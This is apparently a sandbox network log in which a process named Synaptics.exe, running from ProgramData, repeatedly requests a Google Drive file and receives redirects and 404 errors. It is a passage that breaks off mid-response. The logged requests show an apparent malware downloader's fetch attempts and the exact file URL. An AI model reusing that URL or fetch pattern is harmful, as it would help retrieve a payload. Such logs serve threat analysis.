                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XgsDdPbZ6vCDzMXhlym6eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49772 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-E_IOEXX06BrzfWjY4xwhbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49775 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:15 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:15 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5Z4P3avfBG68kaakywAWo0D4olB3OYZ3h4joyVWsUjyI1FvodoeuEcd76Z8tLoQUj3V-x8fJQ
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cL3jY0DY5eSwx2XUiIBHJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:15 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:15 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="YoBq6b5RBBKaeWyy9NLuGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:15 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49777 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:16 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49776 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:16 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49778 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:16 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49779 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:16 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49785 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:17 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
2024-12-30 10:23:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:17 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-j1uWCpJQdcsiUQgEui991g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49786 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:17 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
2024-12-30 10:23:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:17 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-tTjONokO1jGxYNdoI0ZdnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49790 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:18 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:18 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5NlPf77H95aFktjKQKcbA_Ze9gfSujdXXHRJGFSJ-7blKvJh0kUYub9GoabjdkTWtMsNLgARY
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-bpq8664In8p0MgBiYt_2rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:18 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:18 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="v99cCJy_YNYAZgjbusUE1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:18 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49791 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:18 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:18 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4N65YpwYZjP31z5M0zcce2zYlEOuDq8V_SG4IpFmwSDAiyQh6RcYvyKHR2YJi3otPTDCfKeOg
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-43vGkHfn5CAi81PUAVue3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:18 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:18 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="gkCocxcubAUQVhaAoriJjg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:18 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 49789 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:18 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
2024-12-30 10:23:18 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-QAEYowd4PxBibscYeee6jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 49788 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:18 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
2024-12-30 10:23:18 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:18 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-KVi2WB_uVLkdnFLtlgQLhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 49800 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:19 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
2024-12-30 10:23:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
